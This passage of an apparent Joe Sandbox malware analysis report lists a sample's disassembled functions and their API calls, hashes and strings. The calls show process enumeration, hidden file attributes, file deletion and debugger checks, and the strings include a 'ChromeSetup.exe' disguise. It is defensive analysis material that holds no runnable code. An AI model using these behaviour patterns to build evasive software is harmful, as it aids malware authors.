                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 355449500-0
                                                                                                  • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
                                                                                                  • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25
                                                                                                  Function 1000281E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68sleepCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1014 1000281e-1000282b 1016 10002831-10002847 call 10001da0 1014->1016 1017 10002926-1000293f exit 1014->1017 1020 10002915-10002920 Sleep 1016->1020 1021 1000284d-10002865 call 10001e30 1016->1021 1020->1017 1024 10002870-10002874 1021->1024 1025 10002913 1024->1025 1026 1000287a-100028cd Sleep call 10002b60 call 10002da0 call 10001fa0 call 10002cb0 1024->1026 1025->1017 1035 1000290e 1026->1035 1036 100028cf-1000290c call 100029f0 call 10001f10 call 10002960 1026->1036 1035->1025 1038 10002867-1000286d 1035->1038 1036->1025 1038->1024
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                    • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                    • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep$CreateInitSnapshotToolhelp32Variantexit
                                                                                                  • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$ChromeSetup.exe
                                                                                                  • API String ID: 4205734914-284283187
                                                                                                  • Opcode ID: 76a2244d046801374e69f27d23f782b19679ddba291410d41aa7a00bfad43085
                                                                                                  • Instruction ID: 01e91d36be03056c32c976757ddfbd5278b963073b9274932eac54e5bb7bc252
                                                                                                  • Opcode Fuzzy Hash: 76a2244d046801374e69f27d23f782b19679ddba291410d41aa7a00bfad43085
                                                                                                  • Instruction Fuzzy Hash: C321ACB4C01218EBEB14CFA0DC99BEEB770FF45391F504298F4052A28ADB34AB44CB51
                                                                                                  Function 10012F80 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                                  • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2185338108-0
                                                                                                  • Opcode ID: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                                  • Instruction ID: 106bc35cbdd57d80b480a718a0c65df66589e39bca71049decacc3f2370ba628
                                                                                                  • Opcode Fuzzy Hash: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                                  • Instruction Fuzzy Hash: AB313CB4A0021ADFDB04CF98CD91BAEB7B5FF48704F108658E916AB391C771AA41CB91
                                                                                                  Function 10001430 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                  • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                  • String ID:
                                                                                                  • API String ID: 2577077003-0
                                                                                                  • Opcode ID: 493dfbf237c9a535aafa1e804c9f1c3c3366dd009bb43d7c840f6e417707dc2e
                                                                                                  • Instruction ID: 90efd60632e2d823e52567890d799542f586c4bd548bb1fa8c7a4ffe1eb11bac
                                                                                                  • Opcode Fuzzy Hash: 493dfbf237c9a535aafa1e804c9f1c3c3366dd009bb43d7c840f6e417707dc2e
                                                                                                  • Instruction Fuzzy Hash: 4D2117B1940219EBEB00DF94CC95BEEBBB4FB08740F108529F515AB290DB74AB45CB90
                                                                                                  Function 10005300 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                  • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                    • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1581416325-0
                                                                                                  • Opcode ID: b6dca49e7f140338e59bc9ee201abc6e232935be4f3253fc458cc6489671f659
                                                                                                  • Instruction ID: 5c88ff171285725a0febf88608a5dc827106f22a602be97f7403975b38e1ce9c
                                                                                                  • Opcode Fuzzy Hash: b6dca49e7f140338e59bc9ee201abc6e232935be4f3253fc458cc6489671f659
                                                                                                  • Instruction Fuzzy Hash: CA215970A00109ABEB54DF64CC95FAEB774FB04750F108268F51AAB2D0DB70AA85CF94
                                                                                                  Function 100135C0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Fiopen@std@@U_iobuf@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2284775142-0
                                                                                                  • Opcode ID: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                                  • Instruction ID: 655dba523039e8c1ca7b53558f86e7561812b5aaf6b8d3e237c0567069c37aa1
                                                                                                  • Opcode Fuzzy Hash: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                                  • Instruction Fuzzy Hash: 08213AB5D04209EFCB04DF98CC81BAEB7B4FB48750F108628E526A7390D735AA50CBA0
                                                                                                  Function 10012F10 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1098 10012f10-10012f20 1099 10012f63 1098->1099 1100 10012f22-10012f3d call 10012c90 call 10012d20 1098->1100 1101 10012f6a-10012f7c call 10012e40 1099->1101 1108 10012f46-10012f58 fclose 1100->1108 1109 10012f3f 1100->1109 1110 10012f61 1108->1110 1111 10012f5a 1108->1111 1109->1108 1110->1101 1111->1110
                                                                                                  APIs
                                                                                                    • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                                    • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                                  • String ID:
                                                                                                  • API String ID: 2996004546-0
                                                                                                  • Opcode ID: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                                  • Instruction ID: a9d9b0767c6718a53788ed456b677ecfb587c67211e8534dc0a09bbe97dd6693
                                                                                                  • Opcode Fuzzy Hash: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                                  • Instruction Fuzzy Hash: C001C9B4A04209EBDB04DF94D996B9DBBB5EF40704F2080A8E9016F391DB71EF95DB81
                                                                                                  Function 100054B0 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1112 100054b0-100054d9 SHGetFolderPathA 1113 100054fa-10005510 call 10002da0 1112->1113 1114 100054db-100054f6 call 10002da0 1112->1114 1119 10005513-10005516 1113->1119 1114->1119
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,10015860,00000000,00000000,?), ref: 100054D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FolderPath
                                                                                                  • String ID:
                                                                                                  • API String ID: 1514166925-0
                                                                                                  • Opcode ID: e6e4afff401893d413fff79f511675b205a9a655f8e681d12dc64428658c1451
                                                                                                  • Instruction ID: 07c3b9f19ba733181f56a7183a0540d47c5f455797d933128116d1b9b8de183c
                                                                                                  • Opcode Fuzzy Hash: e6e4afff401893d413fff79f511675b205a9a655f8e681d12dc64428658c1451
                                                                                                  • Instruction Fuzzy Hash: 0BF0F974614108ABEB54DF54C892FDD77B9EB44741F108099F9499B280EBB1AF80DB81
                                                                                                  Function 10012400 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040537880-0
                                                                                                  • Opcode ID: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                                  • Instruction ID: b5d0b15e863f3ba68657ea4ca4a108191cbcefbbccc9c59a0a057f78330705e7
                                                                                                  • Opcode Fuzzy Hash: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                                  • Instruction Fuzzy Hash: 1FE01A74A00208EFDB08DB94C981B6CBBB5EF85305F6081A8D9066B381D631AE22DB84
                                                                                                  Function 10005520 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033686569-0
                                                                                                  • Opcode ID: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                                  • Instruction ID: f2f8e3d453fe78865ccc53f7e24a17e21a0dec87b166a9a16b5ac37ce018f2ca
                                                                                                  • Opcode Fuzzy Hash: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                                  • Instruction Fuzzy Hash: 5BC02B7520471C57AF808EE4BC448CB33ECD7095C33004000FE0CCB100C532E7019B60
                                                                                                  Function 10005740 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                                  • Instruction ID: ee6079dce25d93f15e917eacbc87c037c8b3b96b664cac2b0563e90788469a29
                                                                                                  • Opcode Fuzzy Hash: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                                  • Instruction Fuzzy Hash: BEB09B3454030C67D5446B51DC59E15771CF7456D1F004450F94D57151CF75FA4447D8

                                                                                                  Non-executed Functions

                                                                                                  Function 008D18A7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windownativethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 008D18E4
                                                                                                  • CreateWindowExW.USER32(00000000,10018410,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 008D190A
                                                                                                  • SendMessageW.USER32(1001C6F0,00000409,00000000,00D77800), ref: 008D193E
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,100019F0,?,00000000,00000000), ref: 008D1990
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 008D199B
                                                                                                  • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 008D19B4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 4292518056-3916222277
                                                                                                  • Opcode ID: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                                  • Instruction ID: 34faf78cb5251462806daac3e1f764cb001e7f2c406fb42760979c060a58dcf8
                                                                                                  • Opcode Fuzzy Hash: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                                  • Instruction Fuzzy Hash: 05312A75A40218FFEB00DF94CC99FAA7B79FB48705F608219FA05AB291C770DA01CB65
                                                                                                  Function 10001FA0 Relevance: 10.6, APIs: 7, Instructions: 73processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000228), ref: 10001FDB
                                                                                                  • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10001FEE
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 10002015
                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?), ref: 10002055
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Widememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3952204985-0
                                                                                                  • Opcode ID: e1b82bfbec12dae18965287c7a410afa830459f4bfe4217f508f8cf9dc3144ff
                                                                                                  • Instruction ID: d3f3af0a4508f7e27652e937122bdb82b1fceeeb5c55f2899ae714965ea1cc71
                                                                                                  • Opcode Fuzzy Hash: e1b82bfbec12dae18965287c7a410afa830459f4bfe4217f508f8cf9dc3144ff
                                                                                                  • Instruction Fuzzy Hash: C3217175900218BBEB50DBE4CC89FEEB7B8EB49741F108198F614A61D5D770AB48CB60
                                                                                                  Function 10016A5E Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10016A6A
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000003), ref: 10016A90
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000050), ref: 10016B1A
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 10016B36
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10016B4F
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 10016B59
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 1045392073-0
                                                                                                  • Opcode ID: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                                  • Instruction ID: 4823d0db6d89783cfdf2c75b6990e32170b40ac30757b8ad96a9877ce2fabe7b
                                                                                                  • Opcode Fuzzy Hash: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                                  • Instruction Fuzzy Hash: 9031C779D052289ADB51DFA4DD89BCDBBB8BF08300F1041AAE40DAB250E7719BC48F45
                                                                                                  Function 008E6A35 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 008E6A41
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 008E6B0D
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008E6B26
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 008E6B30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: f2824bad1c03e64228532995a74806979f2a3e591e50c28ff2d2bcfbf7cad9c5
                                                                                                  • Instruction ID: b10db7d082a946398cac6c7ea06779dba3c6df3a4745fdbd01669e6f83809874
                                                                                                  • Opcode Fuzzy Hash: f2824bad1c03e64228532995a74806979f2a3e591e50c28ff2d2bcfbf7cad9c5
                                                                                                  • Instruction Fuzzy Hash: 4E31F8B5D052289BDB61DFA5C9897CDBBB8FF08300F1041AAE40DEB250E7709B848F45
                                                                                                  Function 10016BF4 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
